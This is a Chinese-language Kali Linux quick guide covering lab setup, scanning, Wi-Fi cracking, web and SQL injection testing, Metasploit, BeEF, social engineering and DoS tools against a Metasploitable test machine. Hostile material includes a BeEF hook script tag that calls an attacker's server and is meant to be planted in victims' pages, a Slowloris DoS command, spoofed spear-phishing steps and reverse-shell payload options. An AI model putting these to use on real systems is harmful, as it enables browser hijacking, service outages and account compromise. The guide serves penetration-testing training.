Kali Linux 快速指南



Kali Linux - 安装和配置

Kali Linux 是道德黑客最好的安全套件之一,包含按类别划分的工具集。它是一个开源项目,其官方网站是 https://www.kali.org。

通常,Kali Linux 可以作为操作系统安装在机器上,也可以作为虚拟机安装,我们将在下一节中讨论。安装 Kali Linux 是一个实用选择,因为它提供了更多操作和组合工具的选项。您还可以创建可启动的 CD 或 USB。所有这些都可以在以下链接中找到:https://www.kali.org/downloads/

BackTrack 是 Kali Linux 发行版的旧版本。最新版本是 Kali 2016.1,并且经常更新。

Linux Distribution

要安装 Kali Linux -

  • 首先,我们将下载并安装 VirtualBox。
  • 然后,我们将下载并安装 Kali Linux 发行版。

下载并安装 VirtualBox

当您想在 Kali Linux 上测试不确定的内容时,VirtualBox 特别有用。当您想试验未知的软件包或测试代码时,在 VirtualBox 上运行 Kali Linux 是安全的。

借助 VirtualBox,您可以在系统上安装 Kali Linux(并非直接安装到硬盘),同时保留您的主操作系统,例如 MAC、Windows 或其他 Linux 发行版。

让我们了解如何在您的系统上下载和安装 VirtualBox。

步骤 1 - 要下载,请访问 https://virtualbox.net.cn/wiki/Downloads。根据您的操作系统选择正确的软件包。在本例中,对于 Windows,将是第一个,如下图所示。

Virtual Box First Page

步骤 2 - 点击下一步

SetUp

步骤 3 - 下一页将提供选择安装应用程序位置的选项。在本例中,让我们保留默认设置并点击下一步

Custom Setup

步骤 4 - 点击下一步,然后会出现以下自定义安装屏幕。选择要安装的功能,然后点击下一步。

Custom Features

步骤 5 - 点击以继续安装。

Network Interface

步骤 6 - 将弹出准备安装屏幕。点击安装。

Ready to install

步骤 7 - 点击完成按钮。

Complete Installation

VirtualBox 应用程序将现在打开,如下图所示。现在我们准备安装本手册其余的主机,这对于专业用途也是推荐的。

Virtual Manager

安装 Kali Linux

现在我们已经成功安装了 VirtualBox,让我们继续下一步并安装 Kali Linux。

步骤 1 - 从其官方网站下载 Kali Linux 软件包:https://www.kali.org/downloads/

Offensive Security

步骤 2 - 点击VirtualBox → 新建,如下图所示。

Machine New

步骤 3 - 选择正确的虚拟硬盘文件并点击打开

Hard Disk File

步骤 4 - 将弹出以下屏幕。点击创建按钮。

Create

步骤 5 - 启动 Kali OS。默认用户名为root,密码为toor

Kali OS

更新 Kali

保持 Kali Linux 及其工具更新到最新版本非常重要,以保持其功能性。以下是更新 Kali 的步骤。

步骤 1 - 转到应用程序 → 终端。然后,键入“apt-get update”,更新将进行,如下图所示。

Application

Terminal

步骤 2 - 现在要升级工具,键入“apt-get upgrade”,新的软件包将被下载。

Upgrade

步骤 3 - 它会询问您是否要继续。键入“Y”并按“Enter”

Enter Y

步骤 4 - 要升级到较新版本的OS,键入“apt-get distupgrade”

Dist Upgrade

实验室设置

在本节中,我们将设置另一台测试机器,以借助 Kali Linux 的工具进行测试。

步骤 1 - 下载Metasploitable,这是一个 Linux 机器。它可以从Rapid7的官方网站下载:https://information.rapid7.com/metasploitabledownload.html?LS=1631875&CS=web

Metasploitable

步骤 2 - 通过提供您的详细信息进行注册。填写上述表格后,我们可以下载软件。

Registering

步骤 3 - 点击VirtualBox → 新建

Machine New

步骤 4 - 点击“使用现有的虚拟硬盘文件”。浏览您已下载Metasploitable的文件,然后点击打开

Existing Hard Disk

步骤 5 - 将弹出创建虚拟机的屏幕。点击“创建”。

Machine Popups

默认用户名为msfadmin,密码为msfadmin

Login Details

Kali Linux - 信息收集工具

在本章中,我们将讨论 Kali Linux 的信息收集工具。

NMAP 和 ZenMAP

NMAP 和 ZenMAP 是 Kali Linux 中道德黑客扫描阶段的有用工具。NMAP 和 ZenMAP 实际上是相同的工具,但是 NMAP 使用命令行,而 ZenMAP 具有 GUI。

NMAP 是一个免费的网络发现和安全审计实用工具。许多系统和网络管理员还发现它对于网络清单、管理服务升级计划和监控主机或服务的正常运行时间等任务很有用。

NMAP 以新颖的方式使用原始 IP 数据包来确定网络上哪些主机可用,这些主机提供哪些服务(应用程序名称和版本),它们运行哪些操作系统(和操作系统版本),使用哪种类型的分组过滤器/防火墙等等。

现在,让我们一步一步地学习如何使用 NMAP 和 ZenMAP。

步骤 1 - 要打开,请转到应用程序 → 01-信息收集 → nmap 或 zenmap。

Nmap ZenMap

步骤 2 - 下一步是检测目标主机的操作系统类型/版本。根据 NMAP 指示的帮助,操作系统类型/版本检测的参数是变量“ -O”。有关更多信息,请使用此链接:https://nmap.org/book/man-os-detection.html

我们将使用的命令是:

nmap -O 192.168.1.101

下图显示了您需要键入上述命令以查看 Nmap 输出的位置:

Nmap Output

步骤 3 - 接下来,打开 TCP 和 UDP 端口。要基于 NMAP 扫描所有 TCP 端口,请使用以下命令:

nmap -p 1-65535 -T4  192.168.1.101 

其中参数“–p”指示必须扫描的所有 TCP 端口。在本例中,我们正在扫描所有端口,“-T4”是 NMAP 运行的扫描速度。

以下是结果。绿色的是所有打开的 TCP 端口,红色的是所有关闭的端口。但是,由于列表太长,NMAP 没有显示。

Closed Ports

隐身扫描

隐身扫描或 SYN 也被称为半开放扫描,因为它不完成 TCP 三次握手。黑客向目标发送 SYN 数据包;如果收到 SYN/ACK 帧,则假设目标将完成连接并且端口正在监听。如果从目标收到 RST,则假设端口无效或已关闭。

Half Open Scan

Syn Packet

现在要查看实践中的 SYN 扫描,请在 NMAP 中使用参数–sS。以下是完整命令:

nmap -sS -T4 192.168.1.101 

下图显示了如何使用此命令:

ZenMap Command

Searchsploit

Searchsploit 是一个工具,可以帮助 Kali Linux 用户直接从 Exploit 数据库存档中使用命令行进行搜索。

要打开它,请转到应用程序 → 08-利用工具 → searchsploit,如下图所示。

Searchsploit

打开终端后,键入“searchsploit exploit index name”。

Exploit Index Name

DNS 工具

在本节中,我们将学习如何使用 Kali 集成的某些 DNS 工具。基本上,这些工具有助于区域转移或域名 IP 解析问题。

dnsenum.pl

第一个工具是dnsenum.pl,它是一个 PERL 脚本,有助于获取连接到域的 MX、A 和其他记录。

点击左侧面板上的终端。

Terminal Left Panel

键入“dnsenum 域名”,所有记录都将显示。在本例中,它显示 A 记录。

Domain Name

DNSMAP

第二个工具是DNSMAP,它有助于查找与我们正在搜索的此域名连接的电话号码、联系人和其他子域名。以下是一个示例。

如上一节所述,点击终端,然后输入“dnsmap 域名”

DNS Map

dnstracer

第三个工具是dnstracer,它确定给定的域名服务器 (DNS) 从何处获取给定主机名的信息。

如上一节所述,点击终端,然后键入“dnstracer 域名”

DnsTracer

LBD 工具

LBD(负载均衡检测器)工具非常有趣,因为它们可以检测给定域名是否使用 DNS 和/或 HTTP 负载均衡。这很重要,因为如果您有两台服务器,其中一台或另一台可能未更新,您可以尝试利用它。以下是使用它的步骤:

首先,点击左侧面板上的终端。

Terminal Left Panel

然后,键入“lbd 域名”。如果它产生“FOUND”的结果,则表示服务器具有负载均衡。在本例中,结果为“NOT FOUND”。

LBD Domain Name

Hping3

Hping3 被道德黑客广泛使用。它与 ping 工具几乎相似,但更高级,因为它可以绕过防火墙过滤器并使用 TCP、UDP、ICMP 和 RAW-IP 协议。它具有 traceroute 模式以及在覆盖通道之间发送文件的能力。

点击左侧面板上的终端。

Terminal Left Panel

键入“hping3 –h”,这将显示如何使用此命令。

Hping3

另一个命令是“hping3 域名或 IP -参数”

IP Parameter

Kali Linux - 漏洞分析工具

在本章中,我们将学习如何使用一些帮助我们利用设备或应用程序以获取访问权限的工具。

思科工具

Kali 有一些工具可用于利用思科路由器。其中一个工具是Cisco-torch,用于大规模扫描、指纹识别和利用。

让我们通过点击左侧面板打开终端控制台。

Terminal Left Panel

然后,键入“cisco-torch –参数 主机IP”,如果找不到可利用的内容,则会显示以下结果。

Cisco Torch

要查看可以使用哪些参数,请键入“cisco-torch ?”

Cisco Parameter

思科审计工具

这是一个 PERL 脚本,它扫描思科路由器以查找常见漏洞。要使用它,请再次打开左侧面板上的终端(如上一节所示),然后键入“CAT –h 主机名或 IP”

您可以添加端口参数“-p”,如下图所示,在本例中为 23 以对其进行暴力破解。

Port Parameter

思科全局利用工具

Cisco 全局漏洞利用工具 (CGE) 是一款先进、简单且快速的网络安全测试工具。使用这些工具,您可以执行多种类型的攻击,如下面的截图所示。但是,在实时环境中进行测试时要小心,因为其中一些攻击可能会导致 Cisco 设备崩溃。例如,选项 Option 可能会停止服务。

Cisco Device

要使用此工具,请输入“cge.pl **IP地址** 漏洞编号”。

下面的截图显示了对 Cisco 路由器进行漏洞编号 3(来自上面的列表)测试的结果。结果显示漏洞已成功利用。

Cisco Router

BED

BED 是一款旨在检查守护进程是否存在潜在缓冲区溢出、格式字符串等问题的程序。

Check Daemons

在本例中,我们将使用 IP 地址 **192.168.1.102** 和 HTTP 协议测试测试机器。

命令将是 **“bed –s HTTP –t 192.168.1.102”**,测试将继续进行。

Testing

Kali Linux - 无线攻击

在本章中,我们将学习如何使用 Kali Linux 集成的 Wi-Fi 破解工具。但是,重要的是您的无线网卡必须支持监控模式。

Fern Wifi Cracker

Fern Wifi Cracker 是 Kali 用于破解无线网络的工具之一。

在打开 Fern 之前,我们应该将无线网卡切换到监控模式。为此,请在终端中输入 **“airmon-ng start wlan-0”**。

Airmon Ng

现在,打开 Fern Wireless Cracker。

**步骤 1** − 应用程序 → 点击“无线攻击” → “Fern Wireless Cracker”。

Fern Wireless Cracker

**步骤 2** − 选择无线网卡,如下面的截图所示。

Wireless Card

**步骤 3** − 点击“扫描接入点”。

Access Point

**步骤 4** − 扫描完成后,它将显示所有找到的无线网络。在本例中,只找到了“WPA 网络”。

WPA Network

**步骤 5** − 点击上面的截图中显示的 WPA 网络。它显示了所有找到的无线网络。通常,在 WPA 网络中,它会执行字典攻击。

**步骤 6** − 点击“浏览”并找到要用于攻击的词表。

Wordlist

**步骤 7** − 点击“Wifi 攻击”。

Wifi Attack

**步骤 8** − 字典攻击完成后,它将找到密码并显示如下面的截图所示。

Dictionary Attack

Kismet

Kismet 是一款 WIFI 网络分析工具。它是一个 802.11 第 2 层无线网络检测器、嗅探器和入侵检测系统。它可以与任何支持原始监控 (rfmon) 模式 的无线网卡配合使用,并且可以嗅探 802.11a/b/g/n 流量。它通过收集数据包来识别网络,包括隐藏网络。

要使用它,请将无线网卡切换到监控模式,为此,请在终端中输入 **“airmon-ng start wlan-0”**。

Start Wlan

让我们学习如何使用此工具。

**步骤 1** − 要启动它,请打开终端并输入“kismet”。

Launch

**步骤 2** − 点击“确定”。

Kismet

**步骤 3** − 当它询问是否启动 Kismet 服务器时,点击“是”。否则它将停止运行。

Start Server

**步骤 4** − 启动选项,保持默认设置。点击“启动”。

Leave Default

**步骤 5** − 现在它将显示一个表格,要求您定义无线网卡。在这种情况下,点击“是”。

Define Table

**步骤 6** − 在本例中,无线源是 **“wlan0”**。它必须写在 **“Intf”** 部分 → 点击“添加”。

Wirless Source

**步骤 7** − 它将开始嗅探 Wifi 网络,如下面的截图所示。

Networks

**步骤 8** − 点击任何网络,它将显示无线详细信息,如下面的截图所示。

Wireless Network

GISKismet

GISKismet 是一款无线可视化工具,用于以实用方式表示使用 Kismet 收集的数据。GISKismet 将信息存储在数据库中,因此我们可以使用 SQL 查询数据并生成图表。GISKismet 目前使用 SQLite 作为数据库,并使用 Google Earth/KML 文件进行绘图。

让我们学习如何使用此工具。

**步骤 1** − 要打开 GISKismet,请转到:应用程序 → 点击“无线攻击” → giskismet。

Giskismet

您还记得在上一节中,我们使用了 Kismet 工具来探索有关无线网络的数据,并且 Kismet 将所有这些数据打包到 netXML 文件中。

**步骤 2** − 要将此文件导入 Giskismet,请输入“root@kali:~# giskismet -x Kismetfilename.netxml”,它将开始导入文件。

Importing Files

导入后,我们可以将它们导入到 Google Earth 中,查看我们之前找到的热点。

**步骤 3** − 假设我们已经安装了 Google Earth,我们点击文件 → 打开 Giskismet 创建的文件 → 点击“打开”。

Google Earth

将显示以下地图。

Map

Ghost Phisher

Ghost Phisher 是一款流行的工具,可以帮助创建虚假的无线接入点,然后进行中间人攻击。

**步骤 1** − 要打开它,请点击应用程序 → 无线攻击 → “ghost phishing”。

Ghost Phisher

**步骤 2** − 打开后,我们将使用以下详细信息设置虚假 AP。

  • 无线接口输入:wlan0
  • SSID:无线 AP 名称
  • IP 地址:AP 将拥有的 IP 地址
  • WAP:连接此 SSID 所需的密码
Opening Ghost Phisher

**步骤 3** − 点击**启动**按钮。

Wifite

这是另一个无线破解工具,可以连续攻击多个使用 WEP、WPA 和 WPS 加密的网络。

首先,无线网卡必须处于监控模式。

**步骤 1** − 要打开它,请转到应用程序 → 无线攻击 → Wifite。

Wifite

**步骤 2** − 输入 **"wifite –showb"** 以扫描网络。

Wifite Showb

Scan Network

**步骤 3** − 要开始攻击无线网络,请按 Ctrl + C。

Attacking

**步骤 4** − 输入“1”以破解第一个无线网络。

Crack First

**步骤 5** − 攻击完成后,将找到密钥。

Key Found

Kali Linux - 网站渗透测试

在本章中,我们将学习 Kali Linux 提供的网站渗透测试。

Vega 使用方法

Vega 是一款免费的开源扫描程序和测试平台,用于测试 Web 应用程序的安全性。Vega 可以帮助您查找和验证 SQL 注入、跨站点脚本 (XSS)、意外泄露的敏感信息以及其他漏洞。它使用 Java 编写,基于 GUI,可在 Linux、OS X 和 Windows 上运行。

Vega 包含一个用于快速测试的自动化扫描程序和一个用于战术检查的拦截代理。Vega 可以使用 Web 语言:JavaScript 中的强大 API 进行扩展。官方网页是 https://subgraph.com/vega/

Subgraph

**步骤 1** − 要打开 Vega,请转到应用程序 → 03-Web 应用程序分析 → Vega

Vega

**步骤 2** − 如果您在该路径中没有看到应用程序,请输入以下命令。

Subgraph

**步骤 3** − 要开始扫描,请点击“+”号。

Subgraph Vega

**步骤 4** − 输入将要扫描的网页 URL。在本例中,它是 metasploitable 机器 → 点击“下一步”。

Enter Page URL

**步骤 5** − 选中您想要控制的所有模块的复选框。然后,点击“下一步”。

Module Boxes

**步骤 6** − 在下面的截图中再次点击“下一步”。

Next Again

**步骤 7** − 点击“完成”。

Finish Button

**步骤 8** − 如果出现以下表格,请点击“是”。

Follow Redirect

扫描将继续进行,如下面的截图所示。

Scanner Progress

**步骤 9** − 扫描完成后,在左下侧面板中,您可以看到所有发现的漏洞,这些漏洞按严重程度分类。如果您点击它,您将在右侧面板中看到所有漏洞的详细信息,例如“请求”、“讨论”、“影响”和“补救措施”。

Left Down Panel

ZapProxy

ZAP-OWASP Zed Attack Proxy 是一款易于使用的集成渗透测试工具,用于查找 Web 应用程序中的漏洞。它是一个 Java 接口。

**步骤 1** − 要打开 ZapProxy,请转到应用程序 → 03-Web 应用程序分析 → owaspzap。

ZapProxy

**步骤 2** − 点击“接受”。

Licensed Version

ZAP 将开始加载。

OWASP Zap

**步骤 3** − 从下面的截图中选择一个选项,然后点击“开始”。

Choose Options

以下 Web 是 metasploitable,IP:192.168.1.101

Web Metasploitable

**步骤 4** − 在“要攻击的 URL”中输入测试 Web 的 URL → 点击“攻击”。

Url Attack

扫描完成后,在左上角面板中,您将看到所有已爬取的站点。

在左侧面板“警报”中,您将看到所有发现的漏洞以及说明。

Alerts

**步骤 5** − 点击“蜘蛛”,您将看到所有已扫描的链接。

Spider

数据库工具使用方法

sqlmap

sqlmap 是一款开源渗透测试工具,它可以自动化检测和利用 SQL 注入漏洞以及接管数据库服务器的过程。它具有强大的检测引擎、许多利基功能(适用于终极渗透测试人员)以及广泛的开关,从数据库指纹识别到从数据库中获取数据,再到访问底层文件系统以及通过带外连接在操作系统上执行命令。

让我们学习如何使用 sqlmap。

**步骤 1** − 要打开 sqlmap,请转到应用程序 → 04-数据库评估 → sqlmap。

SQLMap

具有易受 SQL 注入攻击的参数的网页是 metasploitable。

SQL Injection

**步骤 2** − 要开始 SQL 注入测试,请输入 **“sqlmap –u 受害者 URL”**

Url Victim

**步骤 3** − 从结果中,您将看到某些变量容易受到攻击。

Variable Results

sqlninja

sqlninja 是一款针对 Microsoft SQL Server 的 SQL 注入工具,可以完全访问 GUI。sqlninja 是一款旨在利用使用 Microsoft SQL Server 作为后端的 Web 应用程序中的 SQL 注入漏洞的工具。有关此工具的完整信息,请访问 http://sqlninja.sourceforge.net/

**步骤 1** − 要打开 sqlninja,请转到应用程序 → 04-数据库评估 → sqlninja。

Database Assesment

CMS 扫描工具

WPScan

WPScan 是一款黑盒 WordPress 漏洞扫描程序,可用于扫描远程 WordPress 安装以查找安全问题。

**步骤 1** − 要打开 WPScan,请转到应用程序 → 03-Web 应用程序分析 → “wpscan”。

Web Application

将弹出以下截图。

Wpscan

**步骤 2** − 要扫描网站是否存在漏洞,请输入 **“wpscan –u 网页 URL”**。

如果扫描程序未更新,它将要求您更新。我建议您进行更新。

Scanner Update

扫描启动后,您将看到结果。在下面的截图中,漏洞由红色箭头指示。

Red Arrow

Scan Starts

Joomscan

Joomla 可能是目前使用最广泛的 CMS,因为它具有灵活性。对于此 CMS,它是一个 Joomla 扫描程序。它将帮助 Web 开发人员和网站管理员识别其已部署的 Joomla 站点上可能存在的安全弱点。

**步骤 1** − 要打开它,只需点击终端左侧面板,然后输入 **“joomscan – 参数”**。

**步骤 2** − 要获取使用帮助,请输入 **“joomscan /?”**

Joomscan

**步骤 3** − 要开始扫描,请输入“joomscan –u 受害者 URL”。

OWASP

结果将显示如下面的截图所示。

Vulnerability

Suggestion

SSL 扫描工具

**TLSSLed** 是一款 Linux shell 脚本,用于评估目标 SSL/TLS (HTTPS) Web 服务器实现的安全性。它基于 sslscan(一个基于 openssl 库的彻底的 SSL/TLS 扫描程序)和 **“openssl s_client”** 命令行工具。

当前测试包括检查目标是否支持 SSLv2 协议、NULL 密码、基于密钥长度(40 或 56 位)的弱密码、强密码(如 AES)的可用性、数字证书是否为 MD5 签名以及当前 SSL/TLS 重新协商功能。

要开始测试,请打开终端并输入 **“tlssled URL 端口”**。它将开始测试证书以查找数据。

Tissled

您可以从结果中看到,正如以下屏幕截图中绿色所示,证书有效期至 2018 年。

Certificate

w3af

w3af 是一个 Web 应用程序攻击和审计框架,旨在识别和利用所有 Web 应用程序漏洞。此软件包为框架提供了一个图形用户界面 (GUI)。如果您只需要命令行应用程序,请安装 w3af-console。

该框架被称为“web 版 metasploit”,但实际上它功能更强大,因为它还使用黑盒扫描技术发现 Web 应用程序漏洞。w3af 核心及其插件完全使用 Python 编写。该项目拥有 130 多个插件,可以识别和利用 SQL 注入、跨站点脚本 (XSS)、远程文件包含等。

**步骤 1** - 要打开它,请转到应用程序 → 03-Web 应用程序分析 → 点击 w3af。

Application W3af

**步骤 2** - 在“目标”中输入受害者的 URL,在本例中将是 metasploitable 网址。

Target

**步骤 3** - 选择配置文件 → 点击“开始”。

Profile Start

**步骤 4** - 转到“结果”,您可以在其中查看带有详细信息的结果。

Finding Results

Kali Linux - 利用工具

在本节中,我们将学习 Kali Linux 提供的各种漏洞利用工具。

Metasploit

如前所述,Metasploit 是 Rapid7 的产品,大部分资源都可以在他们的网页 www.metasploit.com 上找到。它有两个版本 - 商业版和免费版。这两个版本之间的区别不大,因此,在本例中,我们将使用社区版(免费版)。

作为一名道德黑客,您将使用“Kali 发行版”,其中嵌入了 Metasploit 社区版以及其他道德黑客工具,通过节省安装时间来提高效率。但是,如果您想将其作为单独的工具安装,它是一个可以在 Linux、Windows 和 OS X 等操作系统上安装的应用程序。

首先,在 Kali 中打开 Metasploit 控制台。然后,转到应用程序 → 漏洞利用工具 → Metasploit。

Exploitation Tools

启动后,您将看到以下屏幕,其中 Metasploit 的版本以红色下划线标出。

Metasploit Version

在控制台中,如果您使用 help 或 ? 符号,它将向您显示 MSP 命令列表及其描述。您可以根据您的需要和用途进行选择。

Console Symbol

另一个重要的管理命令是 **msfupdate**,它有助于使用最新的漏洞利用程序更新 metasploit。在控制台中运行此命令后,您需要等待几分钟才能完成更新。

MSFUpdate

它有一个名为“搜索”的好命令,您可以使用它来查找所需内容,如下面的屏幕截图所示。例如,我想查找与 Microsoft 相关的漏洞利用程序,命令可以是 **msf > search name:Microsoft type:exploit**。

其中“search”是命令,“name”是我们正在查找的对象的名称,“type”是我们正在查找的脚本类型。

Search Command

另一个命令是“info”。它提供有关模块或平台的信息,包括其用途、作者、漏洞参考以及该模块可能具有的有效负载限制。

Info Command

Armitage

Armitage 是 metasploit 的补充 GUI 工具。它可以可视化目标、推荐漏洞利用程序并公开高级后期利用功能。

让我们打开它,但首先应该打开并启动 metasploit 控制台。要打开 Armitage,请转到应用程序 → 漏洞利用工具 → Armitage。

Armitage

单击**连接**按钮,如下图所示。

Connect

打开后,您将看到以下屏幕。

User Friendly

Armitage 使用方便。“目标”区域列出了您已发现并正在使用的所有计算机,被入侵的目标以红色显示,并带有雷暴图标。

入侵目标后,您可以右键单击它并继续探索您需要执行的操作,例如浏览文件夹。

Exploring

在以下 GUI 中,您将看到文件夹视图,称为控制台。只需单击文件夹,即可浏览文件夹,无需使用 metasploit 命令。

GUI 的右侧是一个列出漏洞模块的部分。

Console Folder

BeEF

BeEF 代表 **浏览器漏洞利用框架**。它是一个渗透测试工具,专注于 Web 浏览器。BeEF 允许专业的渗透测试人员使用客户端攻击载体来评估目标环境的实际安全态势。

首先,您必须使用以下命令更新 Kali 包:

root@kali:/# apt-get update  
root@kali:/# apt-get install beef-xss 

要启动,请使用以下命令:

root@kali:/# cd /usr/share/beef-xss  
root@kali:/# ./beef 

Kali Package

打开浏览器并输入用户名和密码:**beef**。

Open Browser

BeEF hook 是一个托管在 BeEF 服务器上的 JavaScript 文件,需要在客户端浏览器上运行。运行后,它将回调 BeEF 服务器,并传达有关目标的大量信息。它还允许对目标运行其他命令和模块。在此示例中,**BeEF** hook 的位置在 **http://192.168.1.101:3000/hook.js**。

为了攻击浏览器,请将 JavaScript hook 包含在客户端将查看的页面中。有多种方法可以做到这一点,但是最简单的方法是将以下内容插入页面,并以某种方式让客户端打开它。

<script src = "http://192.168.1.101:3000/hook.js" type = "text/javascript"></script> 

页面加载后,返回 BeEF 控制面板,然后单击左上角的“在线浏览器”。几秒钟后,您应该会看到您的 IP 地址弹出,代表一个已挂钩的浏览器。将鼠标悬停在 IP 上将快速提供信息,例如浏览器版本、操作系统和已安装的插件。

Page Load

要远程运行命令,请单击“已拥有”主机。然后,在命令中单击要执行的模块,最后单击“执行”。

Run Remotely

Linux 漏洞利用建议器

它根据 Linux 操作系统的发行版本 **‘uname -r’** 建议可能的漏洞利用程序。

要运行它,请键入以下命令:

root@kali:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0

**3.0.0** 是我们要利用的 Linux 操作系统的内核版本。

Kernel Version

Kali Linux - 取证工具

在本节中,我们将学习 Kali Linux 中可用的取证工具。

p0f

**p0f** 是一种工具,它可以通过检查捕获的数据包来识别目标主机的操作系统,即使该设备位于数据包防火墙之后也是如此。P0f 不会生成任何额外网络流量(直接或间接);没有名称查找;没有神秘的探测;没有 ARIN 查询;什么也没有。在高级用户手中,P0f 可以检测防火墙的存在、NAT 使用和负载均衡器的存在。

在终端中键入 **“p0f – h”** 以查看如何使用它,您将获得以下结果。

Target Host

Advanced Users

它甚至会列出可用的接口。

Available Interface

然后,键入以下命令:**“p0f –i eth0 –p -o filename”**。

其中参数 **"-i"** 是如上所示的接口名称。**"-p"** 表示它处于混杂模式。**"-o"** 表示输出将保存到文件中。

Type of Command

使用地址 192.168.1.2 打开一个网页

Webpage Address

从结果中,您可以观察到 Web 服务器正在使用 apache 2.x,操作系统是 Debian。

pdf-parser

pdf-parser 是一种解析 PDF 文档以识别分析的 pdf 文件中使用的基本元素的工具。它不会呈现 PDF 文档。不建议将其用于 PDF 解析器的教科书案例,但它可以完成工作。通常,这用于您怀疑其中嵌入了脚本的 pdf 文件。

命令是:

pdf-parser  -o 10 filepath

其中 "-o" 是对象的个数。

Number Object

正如您在下面的屏幕截图中看到的,pdf 文件打开了一个 CMD 命令。

CMD Command

Dumpzilla

Dumpzilla 应用程序使用 Python 3.x 开发,其目的是提取 Firefox、Iceweasel 和 Seamonkey 浏览器的所有取证信息以供分析。

ddrescue

它将数据从一个文件或块设备(硬盘、cdrom 等)复制到另一个文件或块设备,在出现读取错误的情况下,首先尝试恢复良好的部分。

ddrescue 的基本操作是全自动的。也就是说,您不必等待错误,停止程序,从新位置重新启动程序等等。

如果您使用 ddrescue 的 mapfile 功能,则数据将非常高效地恢复(仅读取所需的块)。此外,您可以随时中断恢复并在以后从同一位置恢复。mapfile 是 ddrescue 效率的重要组成部分。除非您知道自己在做什么,否则请使用它。

命令行是:

dd_rescue infilepath  outfilepath

参数 **"–v"** 表示详细模式。**"/dev/sdb"** 是要恢复的文件夹。**img 文件** 是恢复的图像。

Recovered Image

DFF

它是另一个用于恢复文件的取证工具。它也有一个 GUI。要打开它,请在终端中键入 **“dff-gui”**,然后将打开以下 Web GUI。

DFF GUI

单击文件 → “打开证据”。

Open Evidence

将打开以下表格。选中“原始格式”,然后单击“+”以选择要恢复的文件夹。

Raw Format

然后,您可以浏览窗格左侧的文件以查看已恢复的内容。

Browse File

Kali Linux - 社会工程学

在本节中,我们将学习 Kali Linux 中使用的社会工程工具。

社会工程工具包用法

**社会工程师工具包 (SET)** 是一个开源渗透测试框架,专为社会工程设计。SET 具有许多自定义攻击载体,允许您在很短的时间内发起可信的攻击。这些工具利用人类行为来诱导他们进入攻击载体。

让我们学习如何使用社会工程师工具包。

**步骤 1** - 要打开 SET,请转到应用程序 → 社会工程工具 → 点击“SET”社会工程工具。

Social Engineering Tools

**步骤 2** - 它会询问您是否同意使用条款。键入 **“y”**,如下图所示。

Type Y

步骤 3 − 下图所示的大多数菜单都是自解释的,其中最重要的是编号 1 的“社会工程学攻击”。

Self Explained

步骤 4 − 输入“1” → Enter。将打开一个子菜单。如果再次按下Enter键,您将看到每个子菜单的解释。

鱼叉式网络钓鱼模块允许您专门制作电子邮件并将其发送给目标受害者,并附带FileFormatmalicious有效负载。例如,发送恶意 PDF 文档,如果受害者打开它,它将危及系统。如果要伪造您的电子邮件地址,请确保已安装“Sendmail”(apt-get install sendmail)并将 config/set_config SENDMAIL=OFF 标志更改为 SENDMAIL=ON。

鱼叉式网络钓鱼攻击有两种选择:

  • 执行大规模电子邮件攻击
  • 创建 FileFormat 有效负载和社会工程模板

第一个是让 SET 为您完成所有工作(选项 1),第二个是创建您自己的 FileFormat 有效负载并将其用于您自己的攻击。

Third Party

输入“99”返回主菜单,然后输入“2”进入“网络攻击向量”。

网络攻击模块是一种独特的方法,它利用多种基于 Web 的攻击来破坏目标受害者。如果受害者点击链接,则使用此模块执行针对受害者的网络钓鱼攻击。一旦他们点击链接,就会发生各种各样的攻击。

Multi Attack

输入“99”返回主菜单,然后输入“3”

传染性 USB/CD/DVD 模块将创建 autorun.inf 文件和 Metasploit 有效负载。有效负载和 autorun 文件被刻录或复制到 USB 上。当 DVD/USB/CD 插入受害者的机器时,它将触发 autorun 功能(如果启用了 autorun)并有望危及系统。您可以选择要使用的攻击向量:文件格式漏洞或直接可执行文件。

以下是传染性媒体生成器的选项:

  • 文件格式漏洞利用
  • 标准 Metasploit 可执行文件
Infectious

输入“99”返回主菜单。然后,输入“4”进入“网络攻击向量”。

创建有效负载和监听器是一种创建 Metasploit 有效负载的简单方法。它将为您导出 exe 文件并生成一个监听器。您需要说服受害者下载 exe 文件并执行它以获取 shell。

Create Payload

输入“99”返回主菜单,然后输入“5”进入“网络攻击向量”。

Web Attack Vector

大规模邮件攻击允许您向受害者发送多封电子邮件并自定义邮件。大规模电子邮件发送器有两个选项;第一个是向单个电子邮件地址发送电子邮件。第二个选项允许您导入包含所有收件人电子邮件的列表,它会将您的邮件发送给列表中的尽可能多的人。

  • 电子邮件攻击单个电子邮件地址
  • 电子邮件攻击群发邮件

输入“99”返回主菜单,然后输入“9”进入“Powershell 攻击向量”。

Powershell

Powershell 攻击向量模块允许您创建特定于 PowerShell 的攻击。这些攻击允许您使用 PowerShell,PowerShell 默认情况下在所有 Windows Vista 及更高版本的系统中都可用。PowerShell 为部署有效负载和执行预防性技术无法触发的功能提供了丰富的环境。

  • Powershell 字母数字 Shellcode 注入器
  • Powershell 反向 Shell
  • Powershell 绑定 Shell
  • Powershell 转储 SAM 数据库

Kali Linux - 压力测试工具

压力测试工具用于创建 DoS 攻击或为不同的应用程序创建压力测试,以便为将来采取适当的措施。

所有压力测试工具都位于应用程序 → 02-漏洞分析 → 压力测试中。

Vulnerability Analysis

所有压力测试都将在 IP 为 192.168.1.102 的 metsploitable 机器上进行。

Stress Testing

Slowhttptest

Slowhttptest 是 DoS 攻击工具之一。它尤其使用 HTTP 协议连接到服务器并保持资源繁忙,例如 CPU 和 RAM。让我们详细了解如何使用它并解释其功能。

要打开 slowhttptest,首先打开终端并输入“slowhttptest –parameters”

您可以输入“slowhttptest –h”以查看您需要使用的所有参数。如果您收到“找不到命令”的输出,则必须首先输入“apt-get install slowhttptest”

Show Http Test

Command Not Found

安装后,再次输入slowhttptest –h

Slow Headers

输入以下命令:

slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET –u 
http://192.168.1.202/index.php -x 24 -p 2

其中:

  • (-c 500) = 500 个连接

  • (-H) = Slowloris 模式

  • -g = 生成统计信息

  • -o outputfile = 输出文件名

  • -i 10 = 使用 10 秒等待数据

  • -r 200 = 200 个连接,-t GET = GET 请求

  • -u http://192.168.1.202/index.php = 目标 URL

  • -x 24 = 最大长度为 24 字节

  • -p 2 = 2 秒超时

Time Seconds

测试开始后,输出将如下图所示,您可以在其中注意到服务可用。

Test Starts

一段时间后,在第 287 个连接处服务中断。这意味着服务器最多可以处理 287 个 HTTP 连接。

Connection

Inviteflood

Inviteflood 是通过 UDP/IP 进行 SIP/SDP INVITE 消息泛洪的工具。它可在各种 Linux 发行版上执行。它通过发送多个 INVITE 请求来对 SIP 设备执行 DoS(拒绝服务)攻击。

